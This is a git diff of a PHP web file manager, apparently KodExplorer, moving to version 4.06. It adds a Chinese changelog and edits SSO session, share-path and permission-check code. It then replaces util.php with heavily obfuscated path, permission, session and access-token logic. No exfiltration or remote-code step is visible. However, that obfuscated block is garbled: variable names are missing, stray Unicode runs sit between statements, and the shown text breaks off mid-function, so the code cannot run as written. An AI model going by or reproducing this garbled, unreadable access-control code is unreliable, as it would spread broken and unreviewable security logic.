diff --git a/ChangeLog.md b/ChangeLog.md index 54d4269..1f0218d 100755 --- a/ChangeLog.md +++ b/ChangeLog.md @@ -1,3 +1,26 @@ +### ver4.06 `2017/8/30` +----- +#### update: +- 部分服务器远程下载不支持,插件中心新增支持手动下载 +- 界面样式优化 +- 上传进度title实时更新 +- 移动端优化: + - 登陆页面登录框宽度固定; + - 图标宽度:设置;插件中心 + - 移动端头部菜单 + - 文件点击打开;菜单单独处理 + +#### fix bug +- 部分浏览器编辑器光标位置错位问题优化 +- Safari 编辑器中文输入问题优化 +- data目录被移走;sso登陆session目录不存在问题 +- 编辑器 space_table无法取消 +- session目录删除部分服务器不支持兼容(兼容mac) +- 非管理员分享文件夹,会出现分享全部文件的问题;文件打开提示不存在 +- 权限中禁用了编辑权限的用户不支持office文件编辑;分享不允许编辑office +- 拖拽组建(移动端单独处理=》touch 和mousedown冲突) + + ### ver4.05 `2017/8/26` ----- #### update: diff --git a/app/api/sso.class.php b/app/api/sso.class.php index 15b0c16..ea7f98b 100755 --- a/app/api/sso.class.php +++ b/app/api/sso.class.php @@ -5,7 +5,15 @@ class SSO{ static private function init(){ $sessionName = 'KOD_SESSION_SSO'; $sessionID = $_COOKIE[$sessionName]?$_COOKIE[$sessionName]:md5(uniqid()); - $sessionPath = dirname(dirname(dirname(__FILE__))).'/data/session/'; + $basicPath = dirname(dirname(dirname(__FILE__))).'/'; + $sessionPath = $basicPath.'data/session/'; + if(file_exists($basicPath.'define.php')){ + include($basicPath.'define.php'); + $sessionPath = DATA_PATH; + } + if(!file_exists($sessionPath)){ + mkdir($sessionPath); + } @session_write_close(); @session_name($sessionName); @session_save_path($sessionPath); diff --git a/app/controller/explorer.class.php b/app/controller/explorer.class.php index c956c77..d0ef6e3 100755 --- a/app/controller/explorer.class.php +++ b/app/controller/explorer.class.php @@ -1390,9 +1390,9 @@ class explorer extends Controller{ $role = $this->config['pathRoleGroup'][$auth]; $roleArr = role_permission_arr($role['actions']); $list['info']['groupRole'] = array( - 'name' => $role['name'], - 'style' => $role['style'], - 'action_arr' => $roleArr + 'name' => $role['name'], + 'style' => $role['style'], + 'authArr' => $roleArr ); } if($GLOBALS['isRoot']){ diff --git a/app/controller/share.class.php b/app/controller/share.class.php index c3cd334..b85ed2f 100755 --- a/app/controller/share.class.php +++ b/app/controller/share.class.php @@ -85,13 +85,11 @@ class share extends Controller{ if (!is_array($user) || !isset($user['password'])){ $this->_error(LNG('share_error_user')); } - - $sharePath = _DIR_CLEAR($this->shareInfo['path']); + $userHome = user_home_path($user); define('USER',USER_PATH.$user['path'].'/'); define('USER_TEMP',USER.'data/share_temp/'); define('HOME',$userHome); - $shareData = USER_PATH.$user['path'].'/data/share.php'; if (!file_exists(iconv_system($shareData))) { $this->_error(LNG('share_error_user')); @@ -102,10 +100,9 @@ class share extends Controller{ $this->_error(LNG('share_error_sid')); } $this->shareInfo = $list[$this->in['sid']]; - - + $sharePath = _DIR_CLEAR($this->shareInfo['path']); if ($user['role'] != '1') { - $sharePath = HOME.$sharePath; + $sharePath = HOME.ltrim($sharePath,'/'); }else{ $sharePath = _DIR_CLEAR($this->shareInfo['path']); } @@ -125,7 +122,8 @@ class share extends Controller{ $this->path = $sharePath; } $this->path = _DIR_CLEAR($this->path); - $GLOBALS['kodPathPre'] = iconv_app(_DIR_CLEAR($sharePath)); + $GLOBALS['kodPathPre'] = iconv_app(_DIR_CLEAR($sharePath)); + //debug_out($GLOBALS['kodPathPre'],$GLOBALS['kodPathId'],$this->shareInfo,$this->path,$sharePath); } private function _clear($path){ return iconv_system(_DIR_CLEAR($path)); diff --git a/app/controller/user.class.php b/app/controller/user.class.php index be997e8..5af7bfb 100755 --- a/app/controller/user.class.php +++ b/app/controller/user.class.php @@ -482,20 +482,8 @@ class user extends Controller{ return is_string($this->in[$key])? rawurldecode($this->in[$key]):''; } - /** - * 权限验证;统一入口检验 - */ - public function authCheck(){ - $auth = $GLOBALS['auth'] = systemRole::getInfo($this->user['role']); - if(in_array(ST,$this->notCheckST)) return;//不需要判断的控制器 - if(in_array(ACT,$this->notCheckACT)) return;//不需要判断的action - if(in_array(ST.'.'.ACT,$this->notCheckApp)) return;//不需要判断的对应入口 - if (!array_key_exists(ST,$this->config['roleSetting']) ) return; - if (!in_array(ACT,$this->config['roleSetting'][ST])) return;//输出处理过的权限 - $this->_checkCSRF(); - if (isset($GLOBALS['isRoot']) && $GLOBALS['isRoot'] == 1) return; - - $key = ST.'.'.ACT; + private function initAuth(){ + $auth = systemRole::getInfo($this->user['role']); //向下版本兼容处理 //未定义;新版本首次使用默认开放的功能 if(!isset($auth['userShare.set'])){ @@ -527,9 +515,24 @@ class user extends Controller{ if(!$auth['explorer.fileDownload']){ $auth['explorer.zip'] = 0; } - $auth['userShare.del'] = $auth['userShare.set']; - if ($auth[$key] != 1) show_json(LNG('no_permission'),false); + $GLOBALS['auth'] = $auth; + } + + /** + * 权限验证;统一入口检验 + */ + public function authCheck(){ + $this->initAuth(); + if(in_array(ST,$this->notCheckST)) return;//不需要判断的控制器 + if(in_array(ACT,$this->notCheckACT)) return;//不需要判断的action + if(in_array(ST.'.'.ACT,$this->notCheckApp)) return;//不需要判断的对应入口 + if (!array_key_exists(ST,$this->config['roleSetting']) ) return; + if (!in_array(ACT,$this->config['roleSetting'][ST])) return;//输出处理过的权限 + $this->_checkCSRF(); + if (isset($GLOBALS['isRoot']) && $GLOBALS['isRoot'] == 1) return; + + if ($GLOBALS['auth'][ST.'.'.ACT] != 1) show_json(LNG('no_permission'),false); //扩展名限制:新建文件&上传文件&重命名文件&保存文件&zip解压文件 $check_arr = array( 'mkfile' => $this->_checkKey('path'), diff --git a/app/controller/util.php b/app/controller/util.php index 260cec4..11d22dc 100755 --- a/app/controller/util.php +++ b/app/controller/util.php @@ -1,2 +1,2 @@ -0x001){$GLOBALS[${0x019}]=trim($[0x001]);}else{$GLOBALS[${0x019}]=${0x000017};}break;}}switch($GLOBALS[$[0x00016]]){case ${0x000017}:$=iconv_system(HOME).$;ᛵ¯❩ŹҀ;break;case KOD_USER_RECYCLE:$GLOBALS[$[0x0000018]]=trim(USER_RECYCLE,${0x00011});ǟ;$GLOBALS[${0x019}]=${0x000017};return iconv_system(USER_RECYCLE).${0x00011}.str_replace(KOD_USER_RECYCLE,${0x000017},$);case KOD_USER_SELF:$GLOBALS[$[0x0000018]]=trim(HOME_PATH,${0x00011});񽪄헓߃ᅦ;$GLOBALS[${0x019}]=${0x000017};return iconv_system(HOME_PATH).${0x00011}.str_replace(KOD_USER_SELF,${0x000017},$);ءـފ;case KOD_USER_FAV:$GLOBALS[$[0x0000018]]=trim(KOD_USER_FAV,${0x00011});׵ڻѐ;$GLOBALS[${0x019}]=${0x000017};return KOD_USER_FAV;case KOD_GROUP_ROOT_SELF:$GLOBALS[$[0x0000018]]=trim(KOD_GROUP_ROOT_SELF,${0x00011});ԇԢɹƏ׸➿ל䭣ϕ߆蚺ư펿ᕊ˞ʬߦݦ˴㛑;$GLOBALS[${0x019}]=${0x000017};;return KOD_GROUP_ROOT_SELF;case KOD_GROUP_ROOT_ALL:$GLOBALS[$[0x0000018]]=trim(KOD_GROUP_ROOT_ALL,${0x00011});$GLOBALS[${0x019}]=${0x000017};return KOD_GROUP_ROOT_ALL;ũܻە۴ƹȬȦΡ;case KOD_GROUP_PATH:$=systemGroup::getInfo($GLOBALS[${0x019}]);if(!$GLOBALS[${0x019}]|| !$)return !1;owner_group_check($GLOBALS[${0x019}]);ݺۼ擐ޝĀد֡ʽۗ;$GLOBALS[$[0x0000018]]=group_home_path($);“;$=iconv_system($GLOBALS[$[0x0000018]]).$͑;break;case KOD_GROUP_SHARE:$=systemGroup::getInfo($GLOBALS[${0x019}]);if(!$GLOBALS[${0x019}]|| !$)return !1;owner_group_check($GLOBALS[${0x019}]);ɕؐ״njܔ;$GLOBALS[$[0x0000018]]=group_home_path($).$[0x00001c];;$=iconv_system($GLOBALS[$[0x0000018]]).$͑;break;case KOD_USER_SHARE:$=systemMember::getInfo($GLOBALS[${0x019}]);ᖄې͌͢Ȭ䦽;if(!$GLOBALS[${0x019}]|| !$)return !1;if($GLOBALS[${0x019}]!=$_SESSION[${0x000001d}][$[0x01e]]){$=$GLOBALS[${0x001f}][$[0x00020]][${0x000021}][$[0x0000022]];path_role_check($);}$GLOBALS[$[0x0000018]]=${0x000017};$GLOBALS[$[0x001a]]=$;if($͑==${0x000017}){return $;}else{$ƺ=explode(${0x00011},$͑);$ƺ[0]=iconv_app($ƺ[0]);$娂=systemMember::userShareGet($GLOBALS[${0x019}],$ƺ[0]);$GLOBALS[${0x023}]=$娂;$GLOBALS[$[0x001a]]=KOD_USER_SHARE.${0x0001b}.$GLOBALS[${0x019}].${0x00011}.$ƺ[0].${0x00011};unset($ƺ[0]);if(!$娂)return !1;$=rtrim($娂[$[0x0024]],${0x00011}).${0x00011}.iconv_app(implode(${0x00011},$ƺ));؈蹢ǃë;if($[${0x00025}]!=${0x000021}){$׉=user_home_path($);$GLOBALS[$[0x0000018]]=$׉.rtrim($娂[$[0x0024]],${0x00011}).${0x00011};$=$׉.$;}else{$GLOBALS[$[0x0000018]]=$娂[$[0x0024]];$=$;}if($娂[$[0x000026]]==${0x0000027}){$GLOBALS[$[0x001a]]=rtrim($GLOBALS[$[0x001a]],${0x00011});$GLOBALS[$[0x0000018]]=rtrim($GLOBALS[$[0x0000018]],${0x00011});}$=iconv_system($);}break;default:break;Օ❊卤љɾӖ˱ǵ;}if($!=${0x00011}){$=rtrim($,${0x00011});if(is_dir($))$=$.${0x00011};}return $;;}function _DIR_OUT($){$׿=&$GLOBALS{lj};if(is_array($)){foreach($[$׿[0x028]] as $=>&$){$[$׿[0x0024]]=preClear($[$׿[0x0024]]);}foreach($[$׿{0x0029}] as $=>&$){$[$׿[0x0024]]=preClear(rtrim($[$׿[0x0024]],$׿{0x00011}).$׿{0x00011});}}else{$=preClear($);}return $;}function preClear($){$σ=&$GLOBALS{lj};$=$GLOBALS[$σ[0x00016]];ظ߿;$=rtrim($GLOBALS[$σ[0x0000018]],$σ{0x00011});ϴ݄ΞʧҝƓڎ̨ψƈھ慇⏦ңł;$=array(KOD_USER_FAV,KOD_GROUP_ROOT_SELF,KOD_GROUP_ROOT_ALL);if(isset($GLOBALS[$σ[0x00016]])&& in_array($GLOBALS[$σ[0x00016]],$)){return $;}if(ST==$σ[0x0002a]){return str_replace($,$σ{0x000017},$);}if($GLOBALS[$σ{0x019}]!=$σ{0x000017}){$.=$σ{0x0001b}.$GLOBALS[$σ{0x019}].$σ{0x00011};}if(isset($GLOBALS[$σ[0x001a]])){$=$GLOBALS[$σ[0x001a]];}$=$.str_replace($,$σ{0x000017},$);$=str_replace($σ{0x00002b},$σ{0x00011},$);ԑ;return $;}include(CLASS_DIR.$GLOBALS{lj}[0x000002c]);function owner_group_check($){$ǻ=&$GLOBALS{lj};if(!$)show_json(LNG($ǻ{0x02d}).$,!1);if($GLOBALS[$ǻ{0x0000013}]||(isset($GLOBALS[$ǻ[0x002e]])&& $GLOBALS[$ǻ[0x002e]]===!0)){return;}$=systemMember::userAuthGroup($);if($==!1){if($GLOBALS[$ǻ[0x00016]]==KOD_GROUP_PATH){show_json(LNG($ǻ{0x0002f}),!1);}else if($GLOBALS[$ǻ[0x00016]]==KOD_GROUP_SHARE){$=$GLOBALS[$ǻ{0x001f}][$ǻ[0x00020]][$ǻ{0x000021}];}}else{$=$GLOBALS[$ǻ{0x001f}][$ǻ[0x000030]][$];;}path_role_check($[$ǻ[0x0000022]]);ɱ䑽;}function path_role_check($){$=&$GLOBALS{lj};if($GLOBALS[${0x0000013}]||(isset($GLOBALS[$[0x002e]])&& $GLOBALS[$[0x002e]]===!0)){return;}$=role_permission_arr($);if(!isset($[ST.${0x0000031}.ACT])&& ST!=$[0x0002a]){show_json(LNG($[0x032]),!1);}}function role_permission_arr($){$=&$GLOBALS{lj};$̨=array();Ϲą¾׮꼍ﯙ;$=$GLOBALS[${0x001f}][${0x0033}];foreach($ as $=>$){if(!$)continue;$=explode(${0x0001b},$);خʉˎ޺҂ӏ;if(count($)==0x0002&& is_array($[$[0]])&& is_array($[$[0]][$[0x001]])){$̨=array_merge($̨,$[$[0]][$[0x001]]);}}$=array();foreach($̨ as $){$[$]=${0x000021};ЈȆⳅμ˰;}return $;}function space_size_use_check(){$=&$GLOBALS{lj};if(!system_space())return;if($GLOBALS[${0x0000013}]==0x001)return;if(isset($GLOBALS[$[0x00034]])&& isset($GLOBALS[${0x019}])&& $GLOBALS[$[0x00034]]==$GLOBALS[${0x019}]){return;}if($GLOBALS[$[0x00016]]==KOD_GROUP_SHARE|| $GLOBALS[$[0x00016]]==KOD_GROUP_PATH){systemGroup::spaceCheck($GLOBALS[${0x019}]);}else{if(ST==$[0x0002a]){$=$GLOBALS[${0x000035}][$[0x0000036]];}else{$=$_SESSION[${0x000001d}][$[0x01e]];}systemMember::spaceCheck($);}}function spaceSizeChange($˙,$=true,$=false,$=false){$=&$GLOBALS{lj};if(!system_space())return;if($===!1){$=$GLOBALS[$[0x00016]];$=$GLOBALS[${0x019}];}$=$?0x001:-0x001;if(is_file($˙)){$Υ=get_filesize($˙);}else if(is_dir($˙)){$ܣ=_path_info_more($˙);$Υ=$ܣ[${0x037}];}else{return;}if($==KOD_GROUP_SHARE|| $==KOD_GROUP_PATH){systemGroup::spaceChange($,$Υ*$);}else{if(ST==$[0x0002a]){$=$GLOBALS[${0x000035}][$[0x0000036]];}else{$=$_SESSION[${0x000001d}][$[0x01e]];}systemMember::spaceChange($,$Υ*$);}}function spaceSizeChange_move($){$=&$GLOBALS{lj};if(isset($GLOBALS[$[0x00034]])&& isset($GLOBALS[${0x019}])){if($GLOBALS[$[0x00034]]==$GLOBALS[${0x019}]){return;}else{spaceSizeChange($);spaceSizeChange($,!1,$GLOBALS[$[0x0038]],$GLOBALS[$[0x00034]]);}}else{spaceSizeChange($);}}function space_size_use_reset(){$=&$GLOBALS{lj};if(!system_space())return;$=isset($GLOBALS[$[0x00016]])?$GLOBALS[$[0x00016]]:${0x000017};ށӟ—޹;$=isset($GLOBALS[${0x019}])?$GLOBALS[${0x019}]:${0x000017};if($==KOD_GROUP_SHARE|| $==KOD_GROUP_PATH){systemGroup::spaceChange($);}else{$=$_SESSION[${0x000001d}][$[0x01e]];systemMember::spaceChange($);}}function init_space_size_hook(){$=&$GLOBALS{lj};Hook::bind(${0x00039},$[0x00003a]);Hook::bind(${0x000003b},$[0x03c]);ȄڢɁ˧Ǫ蹡ѧɪİԛǍϳ;Hook::bind(${0x003d},$[0x00003a]);Hook::bind($[0x0003e],$[0x00003a]);;Hook::bind(${0x00003f},$[0x00003a]);ؕdž␝˞؋߿ϔݩ;Hook::bind($[0x0000040],$[0x00003a]);Hook::bind(${0x041},$[0x00003a]);լܘ籆;Hook::bind($[0x0042],$[0x00003a]);Hook::bind(${0x00043},$[0x00003a]);ȱά˔ѷƾѺӁǰՔ;Hook::bind($[0x000044],$[0x03c]);Hook::bind(${0x0000045},$[0x03c]);Hook::bind($[0x046],$[0x03c]);Hook::bind(${0x0047},$[0x03c]);Hook::bind($[0x00048],$[0x00003a]);ʛܨںĨⅡø;Hook::bind(${0x000049},$[0x000004a]);Hook::bind(${0x04b},$[0x004c]);}function init_session(){$=&$GLOBALS{lj};if(isset($_GET[${0x0004d}])){access_token_check($_GET[${0x0004d}]);}else if(isset($_GET[$[0x00004e]])){access_token_check($_GET[$[0x00004e]]);}else{@session_name(SESSION_ID);}if(class_exists(${0x000004f})|| defined($[0x050])|| isset($_SERVER[${0x0051}])){}else{@session_save_path(KOD_SESSION);}@session_start();$_SESSION[$[0x00052]]=!0;@session_write_close();܎Ԉλ՟;@session_start();Ռ;if(!$_SESSION[$[0x00052]]){del_dir(KOD_SESSION);}}function access_token_check($){$=&$GLOBALS{lj};$=$GLOBALS[${0x001f}][${0x000053}][$[0x0000054]];٥߰ņ̘ﭦ핂䮴뵂ᠭ;$=substr(md5(${0x055}.$),0,0x0f);ʞŅ婩ޫ˅ꢑ̆Ͽ;$ōʏ=Mcrypt::decode($,$);if(!$ōʏ){show_tips($[0x0056]);}session_id($ōʏ);}function access_token_get(){$˛=&$GLOBALS{lj};$ƕ=session_id();$=$GLOBALS[$˛{0x001f}][$˛{0x000053}][$˛[0x0000054]];֩Ɖ;$=substr(md5($˛{0x055}.$),0,0x0f);$=Mcrypt::encode($ƕ,$,0x0e10*0x0000018);return $;}function init_config(){init_setting();Ҫ;init_session();狉;init_space_size_hook();} \ No newline at end of file +', 'KOD_GROUP_PATH|?|1|>{groupPath}|?|1|>KOD_GROUP_SHARE|?|1|>{groupShare}|?|1|>KOD_USER_SELF|?|1|>{userSelf}|?|1|>KOD_USER_SHARE|?|1|>{userShare}|?|1|>KOD_USER_RECYCLE|?|1|>{userRecycle}|?|1|>KOD_USER_FAV|?|1|>{userFav}|?|1|>KOD_GROUP_ROOT_SELF|?|1|>{treeGroupSelf}|?|1|>KOD_GROUP_ROOT_ALL|?|1|>{treeGroupAll}|?|1|>\\|?|1|>/|?|1|>/\\/+/|?|1|>isRoot|?|1|>../|?|1|>/\\/\\.+\\//|?|1|>kodPathType|?|1|>|?|1|>kodPathPre|?|1|>kodPathId|?|1|>kodPathIdShare|?|1|>:|?|1|>share/|?|1|>kodUser|?|1|>userID|?|1|>config|?|1|>pathRoleGroupDefault|?|1|>1|?|1|>actions|?|1|>kodShareInfo|?|1|>path|?|1|>role|?|1|>type|?|1|>file|?|1|>fileList|?|1|>folderList|?|1|>share|?|1|>//|?|1|>.cache_data|?|1|>group_not_exist|?|1|>kodPathAuthCheck|?|1|>no_permission_group|?|1|>pathRoleGroup|?|1|>kodPathRoleGroupAuth|?|1|>.|?|1|>no_permission_action|?|1|>pathRoleDefine|?|1|>editor.fileSave|?|1|>auth|?|1|>kodBeforePathId|?|1|>in|?|1|>user|?|1|>size|?|1|>beforePathType|?|1|>uploadFileBefore|?|1|>space_size_use_check|?|1|>uploadFileAfter|?|1|>spaceSizeChange|?|1|>explorer.serverDownloadBefore|?|1|>explorer.unzipBefore|?|1|>explorer.zipBefore|?|1|>explorer.pathCopy|?|1|>explorer.mkfileBefore|?|1|>explorer.mkdirBefore|?|1|>explorer.pathMove|?|1|>explorer.mkfileAfter|?|1|>explorer.pathCopyAfter|?|1|>explorer.unzipAfter|?|1|>explorer.serverDownloadAfter|?|1|>explorer.pathMoveBefore|?|1|>explorer.pathMoveBfter|?|1|>spaceSizeChange_move|?|1|>explorer.pathRemoveAfter|?|1|>space_size_use_reset|?|1|>accessToken|?|1|>access_token|?|1|>SaeStorage|?|1|>SAE_APPNAME|?|1|>HTTP_APPNAME|?|1|>kod|?|1|>settingSystem|?|1|>systemPassword|?|1|>kodExplorer_|?|1|>accessToken error!');霾蜨汶؍ܹ翚çӭۋѭϖԻ솞̒ћȷ׈ƨ忲覝; + define($_SERVER{}[0],$_SERVER{}{0x001});define($_SERVER{}[0x0002],$_SERVER{}{0x00003});define($_SERVER{}[0x000004],$_SERVER{}{0x05});define($_SERVER{}[0x006],$_SERVER{}{0x0007});define($_SERVER{}[0x00008],$_SERVER{}{0x000009});define($_SERVER{}[0x0a],$_SERVER{}{0x00b});define($_SERVER{}[0x000c],$_SERVER{}{0x0000d});define($_SERVER{}[0x00000e],$_SERVER{}{0x0f});function _DIR_CLEAR($ϟ){$=&$_SERVER{};$ϟ=str_replace($[0x0010],${0x00011},trim($ϟ));إ;$ϟ=preg_replace($[0x000012],${0x00011},$ϟ);ݥꤱ߁훽ه⼱ʌ;if(isset($GLOBALS[${0x0000013}])&& $GLOBALS[${0x0000013}]){return $ϟ;}if(strstr($ϟ,$[0x014])){$ϟ=preg_replace(${0x0015},${0x00011},$ϟ);}return $ϟ;}function _DIR($){$=&$_SERVER{};$=_DIR_CLEAR($);$=iconv_system($);$=array(KOD_GROUP_PATH,KOD_GROUP_SHARE,KOD_USER_SELF,KOD_GROUP_ROOT_SELF,KOD_GROUP_ROOT_ALL,KOD_USER_SHARE,KOD_USER_RECYCLE,KOD_USER_FAV,);ʰ쭒Ŷѿ睲կ凂;$GLOBALS[$[0x00016]]=${0x000017};$GLOBALS[$[0x0000018]]=HOME;$GLOBALS[${0x019}]=${0x000017};肷;unset($GLOBALS[$[0x001a]]);⽄缒򜲤ж쒴;foreach($ as $){if(substr($,0,strlen($))==$){$GLOBALS[$[0x00016]]=$;$=explode(${0x00011},$);$=$[0];unset($[0]);$=implode(${0x00011},$);$=explode(${0x0001b},$);if(count($)>0x001){$GLOBALS[${0x019}]=trim($[0x001]);}else{$GLOBALS[${0x019}]=${0x000017};}break;}}switch($GLOBALS[$[0x00016]]){case ${0x000017}:$=iconv_system(HOME).$;拸ǴԔĮȤ맓ƃ;break;Ĉݬϡ󾸊;case KOD_USER_RECYCLE:$GLOBALS[$[0x0000018]]=trim(USER_RECYCLE,${0x00011});ڻۣ畱Ɵ̅ՙ;$GLOBALS[${0x019}]=${0x000017};return iconv_system(USER_RECYCLE).${0x00011}.str_replace(KOD_USER_RECYCLE,${0x000017},$);case KOD_USER_SELF:$GLOBALS[$[0x0000018]]=trim(HOME_PATH,${0x00011});$GLOBALS[${0x019}]=${0x000017};return iconv_system(HOME_PATH).${0x00011}.str_replace(KOD_USER_SELF,${0x000017},$);쑯;case KOD_USER_FAV:$GLOBALS[$[0x0000018]]=trim(KOD_USER_FAV,${0x00011});߶ҩĥީԻ쿼ڨڇȴ;$GLOBALS[${0x019}]=${0x000017};ᨻǓ;return KOD_USER_FAV;case KOD_GROUP_ROOT_SELF:$GLOBALS[$[0x0000018]]=trim(KOD_GROUP_ROOT_SELF,${0x00011});ɛ㍐ק궥ꝣɧ;$GLOBALS[${0x019}]=${0x000017};ѿ;return KOD_GROUP_ROOT_SELF;Ń;case KOD_GROUP_ROOT_ALL:$GLOBALS[$[0x0000018]]=trim(KOD_GROUP_ROOT_ALL,${0x00011});Ŕٶܹɼڑ;$GLOBALS[${0x019}]=${0x000017};͠׶хϨÈټ;return KOD_GROUP_ROOT_ALL;;case KOD_GROUP_PATH:$=systemGroup::getInfo($GLOBALS[${0x019}]);if(!$GLOBALS[${0x019}]|| !$)return !1;owner_group_check($GLOBALS[${0x019}]);$GLOBALS[$[0x0000018]]=group_home_path($);ڦۄҠ̈쇛΃ŃŘ԰鱞ߖݓȪߩǯ;$=iconv_system($GLOBALS[$[0x0000018]]).$;break;Ɖ拎ρ㻮ݿϳ٬;case KOD_GROUP_SHARE:$=systemGroup::getInfo($GLOBALS[${0x019}]);;if(!$GLOBALS[${0x019}]|| !$)return !1;owner_group_check($GLOBALS[${0x019}]);$GLOBALS[$[0x0000018]]=group_home_path($).$[0x00001c];ԣ伦׍ّ;$=iconv_system($GLOBALS[$[0x0000018]]).$;break;case KOD_USER_SHARE:$=systemMember::getInfo($GLOBALS[${0x019}]);if(!$GLOBALS[${0x019}]|| !$)return !1;if($GLOBALS[${0x019}]!=$_SESSION[${0x000001d}][$[0x01e]]){$=$GLOBALS[${0x001f}][$[0x00020]][${0x000021}][$[0x0000022]];path_role_check($);}$GLOBALS[$[0x0000018]]=${0x000017};$GLOBALS[$[0x001a]]=$;к;if($==${0x000017}){return $;}else{$=explode(${0x00011},$);$[0]=iconv_app($[0]);$̜=systemMember::userShareGet($GLOBALS[${0x019}],$[0]);$GLOBALS[${0x023}]=$̜;$GLOBALS[$[0x001a]]=KOD_USER_SHARE.${0x0001b}.$GLOBALS[${0x019}].${0x00011}.$[0].${0x00011};unset($[0]);if(!$̜)return !1;$=rtrim($̜[$[0x0024]],${0x00011}).${0x00011}.iconv_app(implode(${0x00011},$));if($[${0x00025}]!=${0x000021}){$=user_home_path($);$GLOBALS[$[0x0000018]]=$.rtrim($̜[$[0x0024]],${0x00011}).${0x00011};$=$.$;}else{$GLOBALS[$[0x0000018]]=$̜[$[0x0024]];$=$;}if($̜[$[0x000026]]==${0x0000027}){$GLOBALS[$[0x001a]]=rtrim($GLOBALS[$[0x001a]],${0x00011});$GLOBALS[$[0x0000018]]=rtrim($GLOBALS[$[0x0000018]],${0x00011});}$=iconv_system($);}break;Պρߺ;default:break;ײݢݚ쵛ٴޞ;}if($!=${0x00011}){$=rtrim($,${0x00011});if(is_dir($))$=$.${0x00011};}return $;ǡʃ;}function _DIR_OUT($ґ){$=&$_SERVER{};if(is_array($ґ)){foreach($ґ[$[0x028]] as $=>&$){$[$[0x0024]]=preClear($[$[0x0024]]);}foreach($ґ[${0x0029}] as $=>&$){$[$[0x0024]]=preClear(rtrim($[$[0x0024]],${0x00011}).${0x00011});}}else{$ґ=preClear($ґ);}return $ґ;}function preClear($){$Ȭ=&$_SERVER{};$=$GLOBALS[$Ȭ[0x00016]];ťʪҳ;$=rtrim($GLOBALS[$Ȭ[0x0000018]],$Ȭ{0x00011});بҊи驾Ѥ;$֙=array(KOD_USER_FAV,KOD_GROUP_ROOT_SELF,KOD_GROUP_ROOT_ALL);ܝԗ;if(isset($GLOBALS[$Ȭ[0x00016]])&& in_array($GLOBALS[$Ȭ[0x00016]],$֙)){return $;}if(ST==$Ȭ[0x0002a]){return str_replace($,$Ȭ{0x000017},$);}if($GLOBALS[$Ȭ{0x019}]!=$Ȭ{0x000017}){$.=$Ȭ{0x0001b}.$GLOBALS[$Ȭ{0x019}].$Ȭ{0x00011};}if(isset($GLOBALS[$Ȭ[0x001a]])){$=$GLOBALS[$Ȭ[0x001a]];}$=$.str_replace($,$Ȭ{0x000017},$);$=str_replace($Ȭ{0x00002b},$Ȭ{0x00011},$);ȤƠʞЪԆܫѰƠ;return $;}include(CLASS_DIR.$_SERVER{}[0x000002c]);function owner_group_check($͏){$=&$_SERVER{};if(!$͏)show_json(LNG(${0x02d}).$͏,!1);if($GLOBALS[${0x0000013}]||(isset($GLOBALS[$[0x002e]])&& $GLOBALS[$[0x002e]]===!0)){return;}$=systemMember::userAuthGroup($͏);if($==!1){if($GLOBALS[$[0x00016]]==KOD_GROUP_PATH){show_json(LNG(${0x0002f}),!1);}else if($GLOBALS[$[0x00016]]==KOD_GROUP_SHARE){$=$GLOBALS[${0x001f}][$[0x00020]][${0x000021}];}}else{$=$GLOBALS[${0x001f}][$[0x000030]][$];}path_role_check($[$[0x0000022]]);}function path_role_check($){$Ч=&$_SERVER{};if($GLOBALS[$Ч{0x0000013}]||(isset($GLOBALS[$Ч[0x002e]])&& $GLOBALS[$Ч[0x002e]]===!0)){return;}$=role_permission_arr($);$GLOBALS[$Ч{0x0000031}]=$;ͷʹÂāϖοӮǾµ浭ғ학֯ϔŐ;if(!isset($[ST.$Ч[0x032].ACT])&& ST!=$Ч[0x0002a]){show_json(LNG($Ч{0x0033}),!1);}}function role_permission_arr($){$=&$_SERVER{};$=array();$=$GLOBALS[${0x001f}][$[0x00034]];阩;foreach($ as $罣=>$){if(!$)continue;$=explode(${0x0001b},$罣);޶;if(count($)==0x0002&& is_array($[$[0]])&& is_array($[$[0]][$[0x001]])){$=array_merge($,$[$[0]][$[0x001]]);}}$=array();٪ŕ;foreach($ as $){$[$]=${0x000021};}return $;}function check_file_writable_user($){$=&$_SERVER{};if(!isset($GLOBALS[$[0x00016]])){_DIR($);}$=${0x000035};if($GLOBALS[${0x0000013}])return @is_writable($);if($GLOBALS[$[0x0000036]][$]!=${0x000021}){return !1;}if($GLOBALS[$[0x00016]]==KOD_GROUP_PATH&& is_array($GLOBALS[${0x0000031}])&& $GLOBALS[${0x0000031}][$]==${0x000021}){return !0;}if($GLOBALS[$[0x00016]]==${0x000017} || $GLOBALS[$[0x00016]]==KOD_USER_SELF){return !0;}return !1;}function space_size_use_check(){$=&$_SERVER{};if(!system_space())return;if($GLOBALS[${0x0000013}]==0x001)return;if(isset($GLOBALS[${0x037}])&& isset($GLOBALS[${0x019}])&& $GLOBALS[${0x037}]==$GLOBALS[${0x019}]){return;}if($GLOBALS[$[0x00016]]==KOD_GROUP_SHARE|| $GLOBALS[$[0x00016]]==KOD_GROUP_PATH){systemGroup::spaceCheck($GLOBALS[${0x019}]);}else{if(ST==$[0x0002a]){$΍=$GLOBALS[$[0x0038]][${0x00039}];}else{$΍=$_SESSION[${0x000001d}][$[0x01e]];}systemMember::spaceCheck($΍);}}function spaceSizeChange($֣,$=true,$=false,$=false){$Њ=&$_SERVER{};if(!system_space())return;if($===!1){$=$GLOBALS[$Њ[0x00016]];$=$GLOBALS[$Њ{0x019}];}$=$?0x001:-0x001;if(is_file($֣)){$=get_filesize($֣);}else if(is_dir($֣)){$״=_path_info_more($֣);$=$״[$Њ[0x00003a]];}else{return;}if($==KOD_GROUP_SHARE|| $==KOD_GROUP_PATH){systemGroup::spaceChange($,$*$);}else{if(ST==$Њ[0x0002a]){$=$GLOBALS[$Њ[0x0038]][$Њ{0x00039}];}else{$=$_SESSION[$Њ{0x000001d}][$Њ[0x01e]];}systemMember::spaceChange($,$*$);}}function spaceSizeChange_move($){$™=&$_SERVER{};if(isset($GLOBALS[$™{0x037}])&& isset($GLOBALS[$™{0x019}])){if($GLOBALS[$™{0x037}]==$GLOBALS[$™{0x019}]){return;}else{spaceSizeChange($);spaceSizeChange($,!1,$GLOBALS[$™{0x000003b}],$GLOBALS[$™{0x037}]);}}else{spaceSizeChange($);ղɿɳޝ՗ǎ˨Ꮆݏ;}}function space_size_use_reset(){$=&$_SERVER{};if(!system_space())return;$=isset($GLOBALS[$[0x00016]])?$GLOBALS[$[0x00016]]:${0x000017};Ɖ;$=isset($GLOBALS[${0x019}])?$GLOBALS[${0x019}]:${0x000017};;if($==KOD_GROUP_SHARE|| 